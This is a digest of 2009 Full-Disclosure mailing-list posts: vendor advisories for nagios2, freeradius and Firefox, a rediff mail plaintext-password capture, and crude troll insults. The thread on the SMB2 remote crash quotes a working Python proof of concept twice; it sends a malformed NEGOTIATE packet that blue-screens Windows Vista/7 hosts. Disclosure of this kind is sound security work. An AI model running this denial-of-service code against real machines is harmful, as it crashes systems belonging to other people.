Re: [Full-disclosure] This is n3td3v and Gary McKinnon's lawyer. My client's have asburger syndrome.

[D-vice]

Teh Lulz are gone, stop feeding the fucking trolls

On Wed, Sep 9, 2009 at 9:42 PM,  wrote:

> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
>
> Hey, buddy, you know spam filters sometimes can be stupid.
> Don't implement a stupid filter in your head.
> Just because I mention a troll in my email, have a hushmail
> address, and post a link you assume I must be rickrolling you or
> something?
>
> I was really surprised when I heard that Gaffie's remote DoS could
> infact be remote code exec. Not a mention here, unless I missed
> something.
>
> That's the link I posted, and since I don't understand shit to asm,
> I was expecting some feedback.
>
> BTW, this is not a flame, but sice you assumed I was trolling, I
> just wanted to make clear I was providing info, and waiting for
> feedback on it.
>
>
>
> PS : I use hush as disposable addresses, and it's none of your
> business. And I don't mind my sister sleeping around, she's just a
> whore anyway.
>
> - --
> Does anybody care?
>
> In fact does anybody who contributes anything useful to this list
> use
> Hushmail? (at this time I am too lazy to look). If not I can set my
> spam
> filter. Amusing as it has been, it has grown tiresome.
>
> btw mr lawyer/mr random guy etc. my dick is bigger than yours, at
> least
> that's what your wife  and sister tell me ;-)
>
> I am a noob with skills marginally better (debatable) than the
> average
> spotty first line support analyst. Therefore constructive criticism
> is
> welcomed, anything else is ignored unless I am bored or stupid
> enough to
> read/repond these postings after a bottle of Shiraz.
>
> regards
> the learner aka
> MrX
>
> ps I wish I didn't have so much to learn.
> -BEGIN PGP SIGNATURE-
> Charset: UTF8
> Version: Hush 3.0
> Note: This signature can be verified at https://www.hushtools.com/verify
>
> wpwEAQMCAAYFAkqoBUAACgkQRVBSp0SbIgej/QP/TfHJGc1k9EsuyMWfEIzLlC1RO1p0
> wn34XeBrO/TzHCgam2jhMGSitbtOtOOGjLKyF+gBXGLaFwFDXh/dZamHtrDFLQGdzX2/
> u7N5rkOSeiAmUys2K5h1iMMcohUlBpaLvsB9XrqBe1Oq3MFHV+H5NYusZlw1gFXNk0y6
> qBRkqZE=
> =ymH2
> -END PGP SIGNATURE-
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

[D-vice]

n3td3v works for micro$ucks, go figure

On Thu, Sep 10, 2009 at 6:56 AM, James Matthews  wrote:

> So Msoft! why can't they just stop reintroducing bugs?
>
>
> On Wed, Sep 9, 2009 at 11:04 AM,  wrote:
>
>> -BEGIN PGP SIGNED MESSAGE-
>> Hash: SHA1
>>
>> How come all I hear about is n3td3v, and I see noone crying out
>> lout about this :
>> http://www.reversemode.com/index.php?option=com_mamblog&Itemid=15&ta
>> sk=show&action=view&id=64&Itemid=15
>>
>> is fd all 'bout trolls nao?
>>
>> - --
>> =
>> - - Release date: September 7th, 2009
>> - - Discovered by: Laurent Gaffié
>> - - Severity: Medium/High
>> =
>>
>> I. VULNERABILITY
>> - -
>> Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.
>>
>> II. BACKGROUND
>> - -
>> Windows vista and newer Windows comes with a new SMB version named
>> SMB2.
>> See:
>> http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#S
>> erver_Message_Block_2.0
>> for more details.
>>
>> III. DESCRIPTION
>> - -
>> SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE
>> PROTOCOL REQUEST functionnality.
>> The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client send
>> to a SMB server, and it's used
>> to identify the SMB dialect that will be used for futher
>> communication.
>>
>> IV. PROOF OF CONCEPT
>> - -
>>
>> Smb-Bsod.py:
>>
>> #!/usr/bin/python
>> # When SMB2.0 recieve a "&" char in the "Process Id High" SMB
>> header field it dies with a
>> # PAGE_FAULT_IN_NONPAGED_AREA
>>
>> from socket import socket
>> from time import sleep
>>
>> host = "IP_ADDR", 445
>> buff = (
>> "\x00\x00\x00\x90" # Begin SMB header: Session message
>> "\xff\x53\x4d\x42" # Server Component: SMB
>> "\x72\x00\x00\x00" # Negociate Protocol
>> "\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
>> "\x00\x26"# Process ID High: --> :) normal value should be
>> "\x00\x00"
>> "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
>> "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
>> "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
>> "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
>> "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
>> "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
>> "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
>> "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
>> "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
>> "\x30\x30\x32\x00"
>> )
>> s = socket()
>> s.connect(host)
>> s.send(buff)
>> s.close()
>>
>> V. BUSINESS IMPACT
>> - -
>> An attacker can remotly crash without no user interaction, any
>> Vista/Windows 7 machine with SMB enable.
>> Windows Xp, 2k, are NOT affected as they dont have this driver.
>>
>> VI. SYSTEMS AFFECTED
>> - -
>> Windows Vista/7 All (64b/32b|SP1/SP2 fully updated) and possibly
>> Win Server 2008
>> as it use the same SMB2.0 driver (not tested).
>>
>> VII. SOLUTION
>> - -
>> Vendor contacted, but no patch available for the moment.
>> Close SMB feature and ports, until a patch is provided.
>>
>> VIII. REFERENCES
>> - -
>> http://microsoft.com
>>
>> IX. CREDITS
>> - -
>> This vulnerability has been discovered by Laurent Gaffié
>> Laurent.gaffie{remove-this}(at)gmail.com
>> http://g-laurent.blogspot.com/
>>
>> X. LEGAL NOTICES
>> - -
>> The information contained within this advisory is supplied "as-is"
>> with no warranties or guarantees of fitness of use or otherwise.
>> I accept no responsibility for any damage caused by the use or
>> misuse of this information.
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>> -BEGIN PGP SIGNATURE-
>> Charset: UTF8
>> Note: This signature can be verified at https://www.hushtools.com/verify
>> Version: Hush 3.0
>>
>> wpwEAQMCAAYFAkqnw/YACgkQRVBSp0SbIgeyMQQAoyMwFvi4CWq+2XUcoyIQUp/MxwBr
>> mUbXX+BJYl6K9ydQqZDxnAwOi24VIBE/xRQcUFMhVH/Uk4zH9KAGzW7/gu3V8Yq0mHPL
>> pCZ9+Lwml3mNeJOg6oZEyJUhmJTF2WcfXLnmjHbys0oShACWCXBAyqyMVQFdNSja9aeC
>> 6kWcu5Q=
>> =MjSD
>> -END PGP SIGNATURE-
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>
>
>
>
> --
> http://www.jewelerslounge.com
>
>
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html

[Full-disclosure] [SECURITY] [DSA 1883-1] New nagios2 packages fix several cross-site scriptings

[Steffen Joeris]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- 
Debian Security Advisory DSA-1883-1  secur...@debian.org
http://www.debian.org/security/  Giuseppe Iuculano
September 10, 2009http://www.debian.org/security/faq
- 

Package: nagios2
Vulnerability  : missing input sanitising
Problem type   : remote
Debian-specific: no
CVE Ids: CVE-2007-5624 CVE-2007-5803 CVE-2008-1360
Debian Bugs: 448371 482445 485439

Several vulnerabilities have been found in nagios2, ahost/service/network
monitoring and management system. The Common Vulnerabilities and
Exposures project identifies the following problems:


Several cross-site scripting issues via several parameters were
discovered in the CGI scripts, allowing attackers to inject arbitrary
HTML code. In order to cover the different attack vectors, these issues
have been assigned CVE-2007-5624, CVE-2007-5803 and CVE-2008-1360.


For the oldstable distribution (etch), these problems have been fixed in
version 2.6-2+etch4.

The stable distribution (lenny) does not include nagios2 and nagios3 is
not affected by these problems.

The testing distribution (squeeze) and the unstable distribution (sid)
do not contain nagios2 and nagios3 is not affected by these problems.


We recommend that you upgrade your nagios2 packages.


Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- ---

Debian (oldstable)
- --

Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, 
mipsel, powerpc, s390 and sparc.

Source archives:

  
http://security.debian.org/pool/updates/main/n/nagios2/nagios2_2.6-2+etch4.diff.gz
Size/MD5 checksum:35589 5aee898df4f6ea4a0fa4a1fb22390a0b
  http://security.debian.org/pool/updates/main/n/nagios2/nagios2_2.6.orig.tar.gz
Size/MD5 checksum:  1734400 a032edba07bf389b803ce817e9406c02
  http://security.debian.org/pool/updates/main/n/nagios2/nagios2_2.6-2+etch4.dsc
Size/MD5 checksum:  948 a4bd33d2bd5c812b5c9899fc41651e37

Architecture independent packages:

  
http://security.debian.org/pool/updates/main/n/nagios2/nagios2-doc_2.6-2+etch4_all.deb
Size/MD5 checksum:  1149816 8b2d0a07cd650edc3e6d33f74b480cb2
  
http://security.debian.org/pool/updates/main/n/nagios2/nagios2-common_2.6-2+etch4_all.deb
Size/MD5 checksum:59416 f70cd9aa86a0eb1b64a914b40da984cd

alpha architecture (DEC Alpha)

  
http://security.debian.org/pool/updates/main/n/nagios2/nagios2_2.6-2+etch4_alpha.deb
Size/MD5 checksum:  1222136 4dc7d3e1230632930471fb0e0dcbd496
  
http://security.debian.org/pool/updates/main/n/nagios2/nagios2-dbg_2.6-2+etch4_alpha.deb
Size/MD5 checksum:  1702766 6ff7f9e7bb6cdaa0cea2fb0dfe35ae72

amd64 architecture (AMD x86_64 (AMD64))

  
http://security.debian.org/pool/updates/main/n/nagios2/nagios2-dbg_2.6-2+etch4_amd64.deb
Size/MD5 checksum:  1687984 4c28fa0a9fa9883cdff1e038c56924e0
  
http://security.debian.org/pool/updates/main/n/nagios2/nagios2_2.6-2+etch4_amd64.deb
Size/MD5 checksum:  1097788 31afdb67e26e5f1a56a9da7a1452

arm architecture (ARM)

  
http://security.debian.org/pool/updates/main/n/nagios2/nagios2-dbg_2.6-2+etch4_arm.deb
Size/MD5 checksum:  1537452 4e4d636a0699cf9f714a522885894a4e
  
http://security.debian.org/pool/updates/main/n/nagios2/nagios2_2.6-2+etch4_arm.deb
Size/MD5 checksum:  1023982 fb3a8f2b2b592bafcf1830172a7d5a8e

hppa architecture (HP PA RISC)

  
http://security.debian.org/pool/updates/main/n/nagios2/nagios2_2.6-2+etch4_hppa.deb
Size/MD5 checksum:  1148976 c875e0ab58ca0f39bf34b1704cc4a969
  
http://security.debian.org/pool/updates/main/n/nagios2/nagios2-dbg_2.6-2+etch4_hppa.deb
Size/MD5 checksum:  1622072 e002a9c7703542bd8aa8e509238ba29c

i386 architecture (Intel ia32)

  
http://security.debian.org/pool/updates/main/n/nagios2/nagios2-dbg_2.6-2+etch4_i386.deb
Size/MD5 checksum:  1587836 778bd65bfb6cfb1f3f0efcb872a32360
  
http://security.debian.org/pool/updates/main/n/nagios2/nagios2_2.6-2+etch4_i386.deb
Size/MD5 checksum:  1016950 720d00ef27782b51c0b7e675c2f82309

ia64 architecture (Intel ia64)

  
http://security.debian.org/pool/updates/main/n/nagios2/nagios2_2.6-2+etch4_ia64.deb
Size/MD5 checksum:  1623324 1a157461c15e81c93670ad92c3792b69
  
http://security.debian.org/pool/updates/main/n/nagios2/nagios2-dbg_2.6-2+etch4_ia64.deb
Size/MD5 checksum:  1711252

Re: [Full-disclosure] Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOLREQUEST Remote B.S.O.D.

[mutiny]

Nearly a year before release, of the new version (of the same thing).

*sigh*
  - Original Message - 
  From: James Matthews 
  To: full-disclosure@lists.grok.org.uk 
  Sent: Thursday, September 10, 2009 12:56 AM
  Subject: Re: [Full-disclosure] Windows Vista/7 : SMB2.0 NEGOTIATE 
PROTOCOLREQUEST Remote B.S.O.D.


  So Msoft! why can't they just stop reintroducing bugs?


  On Wed, Sep 9, 2009 at 11:04 AM,  wrote:

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

How come all I hear about is n3td3v, and I see noone crying out
lout about this :
http://www.reversemode.com/index.php?option=com_mamblog&Itemid=15&ta
sk=show&action=view&id=64&Itemid=15

is fd all 'bout trolls nao?

- --
=
- - Release date: September 7th, 2009

- - Discovered by: Laurent Gaffié
- - Severity: Medium/High
=

I. VULNERABILITY
- -
Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

II. BACKGROUND
- -
Windows vista and newer Windows comes with a new SMB version named
SMB2.
See:
http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#S
erver_Message_Block_2.0
for more details.

III. DESCRIPTION
- -
SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE
PROTOCOL REQUEST functionnality.
The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client send
to a SMB server, and it's used
to identify the SMB dialect that will be used for futher
communication.

IV. PROOF OF CONCEPT
- -

Smb-Bsod.py:

#!/usr/bin/python
# When SMB2.0 recieve a "&" char in the "Process Id High" SMB
header field it dies with a
# PAGE_FAULT_IN_NONPAGED_AREA

from socket import socket
from time import sleep

host = "IP_ADDR", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: --> :) normal value should be
"\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()

V. BUSINESS IMPACT
- -
An attacker can remotly crash without no user interaction, any
Vista/Windows 7 machine with SMB enable.
Windows Xp, 2k, are NOT affected as they dont have this driver.

VI. SYSTEMS AFFECTED
- -
Windows Vista/7 All (64b/32b|SP1/SP2 fully updated) and possibly
Win Server 2008
as it use the same SMB2.0 driver (not tested).

VII. SOLUTION
- -
Vendor contacted, but no patch available for the moment.
Close SMB feature and ports, until a patch is provided.

VIII. REFERENCES
- -
http://microsoft.com

IX. CREDITS
- -
This vulnerability has been discovered by Laurent Gaffié
Laurent.gaffie{remove-this}(at)gmail.com
http://g-laurent.blogspot.com/

X. LEGAL NOTICES
- -
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or
misuse of this information.


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
-BEGIN PGP SIGNATURE-
Charset: UTF8
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 3.0

wpwEAQMCAAYFAkqnw/YACgkQRVBSp0SbIgeyMQQAoyMwFvi4CWq+2XUcoyIQUp/MxwBr
mUbXX+BJYl6K9ydQqZDxnAwOi24VIBE/xRQcUFMhVH/Uk4zH9KAGzW7/gu3V8Yq0mHPL
pCZ9+Lwml3mNeJOg6oZEyJUhmJTF2WcfXLnmjHbys0oShACWCXBAyqyMVQFdNSja9aeC
6kWcu5Q=
=MjSD
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/



  -- 
  http:/

[Full-disclosure] [ MDVSA-2009:226 ] freeradius

[security]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2009:226
 http://www.mandriva.com/security/
 ___

 Package : freeradius
 Date: September 10, 2009
 Affected: Corporate 4.0
 ___

 Problem Description:

 A vulnerability has been found and corrected in freeradius:
 
 The rad_decode function in FreeRADIUS before 1.1.8 allows remote
 attackers to cause a denial of service (radiusd crash) via zero-length
 Tunnel-Password attributes.  NOTE: this is a regression error related
 to CVE-2003-0967 (CVE-2009-3111).
 
 This update provides a solution to this vulnerability.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3111
 ___

 Updated Packages:

 Corporate 4.0:
 37f0dc23fdd28466d7a94db9ad445e36  
corporate/4.0/i586/freeradius-1.0.4-2.5.20060mlcs4.i586.rpm
 e9f0aeb620f6c18f7abe8cd030ee5b45  
corporate/4.0/i586/libfreeradius1-1.0.4-2.5.20060mlcs4.i586.rpm
 5efc89f68a9ae3323f4d08db2db99c76  
corporate/4.0/i586/libfreeradius1-devel-1.0.4-2.5.20060mlcs4.i586.rpm
 7cfebad483805297740a24c630d959c4  
corporate/4.0/i586/libfreeradius1-krb5-1.0.4-2.5.20060mlcs4.i586.rpm
 e9cfff1376db58a3dec1499bdada7d07  
corporate/4.0/i586/libfreeradius1-ldap-1.0.4-2.5.20060mlcs4.i586.rpm
 97d0dd301a51c5402d4fdedd113a4162  
corporate/4.0/i586/libfreeradius1-mysql-1.0.4-2.5.20060mlcs4.i586.rpm
 617dbf6ea9191afb7f9573e65883  
corporate/4.0/i586/libfreeradius1-postgresql-1.0.4-2.5.20060mlcs4.i586.rpm
 3a75efd86b69a5bb0ac240d1e7c2ae75  
corporate/4.0/i586/libfreeradius1-unixODBC-1.0.4-2.5.20060mlcs4.i586.rpm 
 a89677d75dc960fd619954eb53b4d749  
corporate/4.0/SRPMS/freeradius-1.0.4-2.5.20060mlcs4.src.rpm

 Corporate 4.0/X86_64:
 b4ac8ca1b8e9bca59c7f1a2b21386e65  
corporate/4.0/x86_64/freeradius-1.0.4-2.5.20060mlcs4.x86_64.rpm
 018ee9ffa0b73a5f5cf2b183f83deb5d  
corporate/4.0/x86_64/lib64freeradius1-1.0.4-2.5.20060mlcs4.x86_64.rpm
 24f796932b9ffe79093351912a1c40e7  
corporate/4.0/x86_64/lib64freeradius1-devel-1.0.4-2.5.20060mlcs4.x86_64.rpm
 adc0cba3f5d762c43c494aed2c2e4924  
corporate/4.0/x86_64/lib64freeradius1-krb5-1.0.4-2.5.20060mlcs4.x86_64.rpm
 c21d434b39fca57615932c5e4c895459  
corporate/4.0/x86_64/lib64freeradius1-ldap-1.0.4-2.5.20060mlcs4.x86_64.rpm
 b52370d5e13cb0e9534050e5f7e8a5a7  
corporate/4.0/x86_64/lib64freeradius1-mysql-1.0.4-2.5.20060mlcs4.x86_64.rpm
 8bdcfbb1740d3967b5ef909f14af32c9  
corporate/4.0/x86_64/lib64freeradius1-postgresql-1.0.4-2.5.20060mlcs4.x86_64.rpm
 d376a3b411ecd4ed71c2289b2da536ae  
corporate/4.0/x86_64/lib64freeradius1-unixODBC-1.0.4-2.5.20060mlcs4.x86_64.rpm 
 a89677d75dc960fd619954eb53b4d749  
corporate/4.0/SRPMS/freeradius-1.0.4-2.5.20060mlcs4.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFKqMYdmqjQ0CJFipgRAmWZAKDiWc30oc8TUdCK9qT5+svPaMOPzQCgm73G
dGxi5xjHNGGtXkz/9cowb9A=
=0yka
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

[Mitch Oliver]

 > I. VULNERABILITY
 > - -
 > Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

This does not appear to apply to the version of Windows 7 released to 
manufacture.  It does, however, 
apply to all beta versions and Windows 2008.

Mitch Oliver

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Plain Text Password Disclosure vulnerability in rediff mail

[kalyan]

Dear all

is it a good mail?what do you feel guys?.It doesn't encrypting your
passwords


POST /cgi-bin/login.cgi HTTP/1.1

Host: mail.rediff.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3)
Gecko/20090824 Firefox/3.5.3

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

Accept-Encoding: gzip,deflate

Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7

Keep-Alive: 300

Connection: keep-alive

Referer: http://www.rediff.com/

Cookie: RuW=1252586041360329; RsW=IND;
RLOC=%5F%5FeZMqPfDceMg%5F%5F4P6Xdf5DkD2%5F%5FtHonjGX8AnI%5F%5Find%5F%5F;
Rt=%3D%3DAMwAjN3czN; accounttype=77;
Rp=g%3D2%26a%3D24%26c%3D08%26s%3D29%26cn%3D099%26z%3D123456%26p%3D034%26e%3D05%26d%3D_04%26i%3D_35_%26dor%3D20060220%26mi%3D3;
RMID=7c7dc92f4aa8f200; RMFS=011MljEWU107fl; app_lang=; ckey=70795
Content-Type: application/x-www-form-urlencoded
Content-Length: 63
login=evil.devil&passwd=*devil.evil*&remember=1&FormName=existing


Regards
Kalyan
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [USN-821-1] Firefox and Xulrunner vulnerabilities

[Jamie Strandboge]

===
Ubuntu Security Notice USN-821-1 September 10, 2009
firefox-3.0, xulrunner-1.9 vulnerabilities
CVE-2009-3070, CVE-2009-3071, CVE-2009-3072, CVE-2009-3074,
CVE-2009-3075, CVE-2009-3076, CVE-2009-3077, CVE-2009-3078,
CVE-2009-3079
===

A security issue affects the following Ubuntu releases:

Ubuntu 8.04 LTS
Ubuntu 8.10
Ubuntu 9.04

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 8.04 LTS:
  firefox-3.0 3.0.14+build2+nobinonly-0ubuntu0.8.04.1
  xulrunner-1.9   1.9.0.14+build2+nobinonly-0ubuntu0.8.04.1

Ubuntu 8.10:
  abrowser3.0.14+build2+nobinonly-0ubuntu0.8.10.1
  firefox-3.0 3.0.14+build2+nobinonly-0ubuntu0.8.10.1
  xulrunner-1.9   1.9.0.14+build2+nobinonly-0ubuntu0.8.10.1

Ubuntu 9.04:
  abrowser3.0.14+build2+nobinonly-0ubuntu0.9.04.1
  firefox-3.0 3.0.14+build2+nobinonly-0ubuntu0.9.04.1
  xulrunner-1.9   1.9.0.14+build2+nobinonly-0ubuntu0.9.04.1

After a standard system upgrade you need to restart Firefox and any
applications that use xulrunner, such as Epiphany, to effect the necessary
changes.

Details follow:

Several flaws were discovered in the Firefox browser and JavaScript
engines. If a user were tricked into viewing a malicious website, a remote
attacker could cause a denial of service or possibly execute arbitrary code
with the privileges of the user invoking the program. (CVE-2009-3070,
CVE-2009-3071, CVE-2009-3072, CVE-2009-3074, CVE-2009-3075)

Jesse Ruderman and Dan Kaminsky discovered that Firefox did not adequately
inform users when security modules were added or removed via PKCS11. If
a user visited a malicious website, an attacker could exploit this to
trick the user into installing a malicious PKCS11 module. (CVE-2009-3076)

It was discovered that Firefox did not properly manage memory when using
XUL tree elements. If a user were tricked into viewing a malicious website,
a remote attacker could cause a denial of service or possibly execute
arbitrary code with the privileges of the user invoking the program.
(CVE-2009-3077)

Juan Pablo Lopez Yacubian discovered that Firefox did properly display
certain Unicode characters in the location bar and other text fields when
using a certain non-Ubuntu font. If a user configured Firefox to use this
font, an attacker could exploit this to spoof the location bar, such as in
a phishing attack. (CVE-2009-3078)

It was discovered that the BrowserFeedWriter in Firefox could be subverted
to run JavaScript code from web content with elevated chrome privileges.
If a user were tricked into viewing a malicious website, an attacker could
exploit this to execute arbitrary code with the privileges of the user
invoking the program. (CVE-2009-3079)


Updated packages for Ubuntu 8.04 LTS:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0_3.0.14+build2+nobinonly-0ubuntu0.8.04.1.diff.gz
  Size/MD5:   106290 9e9affc499213399a986fa8accd06a9a

http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0_3.0.14+build2+nobinonly-0ubuntu0.8.04.1.dsc
  Size/MD5: 2781 1169bce3f68552493e1bc47f7679a585

http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0_3.0.14+build2+nobinonly.orig.tar.gz
  Size/MD5: 11623385 f575ddd6c1d07a896c87e3aabdb6a96b

http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.14+build2+nobinonly-0ubuntu0.8.04.1.diff.gz
  Size/MD5:79438 b5a4f3597dd4e38a305a3171d1927522

http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.14+build2+nobinonly-0ubuntu0.8.04.1.dsc
  Size/MD5: 2832 fe9542586e0aeed4db98bc9754010c84

http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.14+build2+nobinonly.orig.tar.gz
  Size/MD5: 40829392 ddbc45f0308e28dd3b0c402a4b5a360c

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-dev_3.0.14+build2+nobinonly-0ubuntu0.8.04.1_all.deb
  Size/MD5:66394 72174ccf649aa8d461cd332d7dbabbdf

http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-gnome-support_3.0.14+build2+nobinonly-0ubuntu0.8.04.1_all.deb
  Size/MD5:66398 9c920413fec6a6b06c750e347c1c0c8c

http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-granparadiso-dev_3.0.14+build2+nobinonly-0ubuntu0.8.04.1_all.deb
  Size/MD5:66370 13f3b6d7fdc28e9fc9baca59b29d82ac

http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-trunk-dev_3.0.14+build2+nobinonly-0ubuntu0.8.04.1_all.deb
  Size/MD5:66350 bf069a0aa9392565372db2769e861592

http://

Re: [Full-disclosure] Plain Text Password Disclosure vulnerability in rediff mail

[webDEViL]

This particularly came in handy when we had those cable connections  
wide spread. Basically this is there since the time rediff started.



Sent from my iPhone

On Sep 10, 2009, at 4:14 PM, kalyan  wrote:


Dear all

is it a good mail?what do you feel guys?.It doesn't encrypting your  
passwords



POST /cgi-bin/login.cgi HTTP/1.1

Host: mail.rediff.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv: 
1.9.1.3) Gecko/20090824 Firefox/3.5.3


Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/ 
*;q=0.8


Accept-Language: en-us,en;q=0.5

Accept-Encoding: gzip,deflate

Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7

Keep-Alive: 300

Connection: keep-alive

Referer: http://www.rediff.com/

Cookie: RuW=1252586041360329; RsW=IND; RLOC=%5F%5FeZMqPfDceMg%5F 
%5F4P6Xdf5DkD2%5F%5FtHonjGX8AnI%5F%5Find%5F%5F; Rt=%3D%3DAMwAjN3czN;  
accounttype=77; Rp=g%3D2%26a%3D24%26c%3D08%26s%3D29%26cn%3D099%26z 
%3D123456%26p%3D034%26e%3D05%26d%3D_04%26i%3D_35_%26dor 
%3D20060220%26mi%3D3; RMID=7c7dc92f4aa8f200; RMFS=011MljEWU107fl;  
app_lang=; ckey=70795

Content-Type: application/x-www-form-urlencoded
Content-Length: 63
login=evil.devil&passwd=devil.evil&remember=1&FormName=existing


Regards
Kalyan
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
